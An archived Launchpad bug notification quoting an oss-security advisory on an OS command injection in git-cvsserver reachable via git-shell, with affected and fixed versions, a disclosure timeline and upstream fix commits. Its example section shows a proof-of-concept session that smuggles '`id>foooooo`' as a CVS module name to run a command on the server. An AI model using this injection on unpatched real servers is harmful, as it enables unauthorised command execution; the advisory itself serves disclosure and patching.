group.of.nepali.translators team mailing list archive

Thread
Date
[Bug 1719740] Re: [DSA 3984-1] Git cvsserver OS Command Injection

To: group.of.nepali.translators@xxxxxxxxxxxxxxxxxxx
From: Simon Quigley <tsimonq2@xxxxxxxxxx>
Date: Tue, 26 Sep 2017 23:23:34 -0000
Reply-to: Bug 1719740 <1719740@xxxxxxxxxxxxxxxxxx>
Sender: bounces@xxxxxxxxxxxxx
** Bug watch added: Debian Bug tracker #876854
   https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=876854

** Also affects: git (Debian) via
   https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=876854
   Importance: Unknown
       Status: Unknown

-- 
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1719740

Title:
  [DSA 3984-1] Git cvsserver OS Command Injection

Status in git package in Ubuntu:
  In Progress
Status in git source package in Trusty:
  In Progress
Status in git source package in Xenial:
  In Progress
Status in git source package in Zesty:
  In Progress
Status in git source package in Artful:
  In Progress
Status in git package in Debian:
  Unknown

Bug description:
  From oss-security[1]:

  [ Authors ]
          joernchen       <joernchen () phenoelit de>

          Phenoelit Group (http://www.phenoelit.de)

  [ Affected Products ]
          Git before 2.14.2, 2.13.6, 2.12.5, 2.11.4 and 2.10.5 (git-cvsserver)
          https://git-scm.com

  [ Vendor communication ]
          2017-09-08 Sent vulnerability details to the git-security list
          2017-09-09 Acknowledgement of the issue, git maintainers ask if
                     a patch could be provided
          2017-09-10 Patch is provided
          2017-09-11 Further backtick operations are patched by the git
                     maintainers, corrections on the provided patch
          2017-09-11 Revised patch is sent out
          2017-09-11 Jeff King proposes to drop `git-cvsserver`'s default
                     invocation from `git-shell`
          2017-09-22 Draft release for git 2.14.2 is created including the
                     fixes
          2017-09-26 Release of this advisory, release of fixed git versions

  [ Description ]
   The `git` subcommand `cvsserver` is a Perl script which makes excessive
   use of the backtick operator to invoke `git`. Unfortunately user input
          is used within some of those invocations.

   It should be noted, that `git-cvsserver` will be invoked by `git-shell`
          by default without further configuration.

  [ Example ]
   Below a example of a OS Command Injection within `git-cvsserver`
          triggered via `git-shell`:

          =====8<=====
  [git@...t ~]$ cat .ssh/authorized_keys
  command="git-shell -c \"$SSH_ORIGINAL_COMMAND\"" ssh-rsa AAAAB3NzaC ....

  [joernchen@...t ~]$ ssh git@...alhost cvs server
  Root /tmp
  E /tmp/ does not seem to be a valid GIT repository
  E
  error 1 /tmp/ is not a valid repository
  Directory .
  `id>foooooo`
  add
  fatal: Not a git repository: '/tmp/'
  Invalid module '`id>foooooo`' at /usr/lib/git-core/git-cvsserver line 3807, <STDIN> line 4.
  [joernchen@...t ~]$

  [git@...t ~]$ cat foooooo
  uid=619(git) gid=618(git) groups=618(git)
  [git@...t ~]$
          =====>8=====

  [ Solution ]
          Upgrade to one of the following git versions:
          * 2.14.2
          * 2.13.6
          * 2.12.5
          * 2.11.4
          * 2.10.5

  [ end of file ]

  -------------------

  No CVE has been assigned yet, but a fix has been released upstream and
  as seen above, the fixes are already in Debian.

  The following upstream commits claim to fix the issue:
   - 985f59c042320ddf0a506e553d5eef9689ef4c32
   - 31add46823fe926e85efbfeab865e366018b33b4
   - 6d6e2f812d366789fb6f4f9ea8decb4777f6f862
   - dca89d4e56dde4b9b48d6f2ec093886a6fa46575

  [1] http://www.openwall.com/lists/oss-security/2017/09/26/9

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/git/+bug/1719740/+subscriptions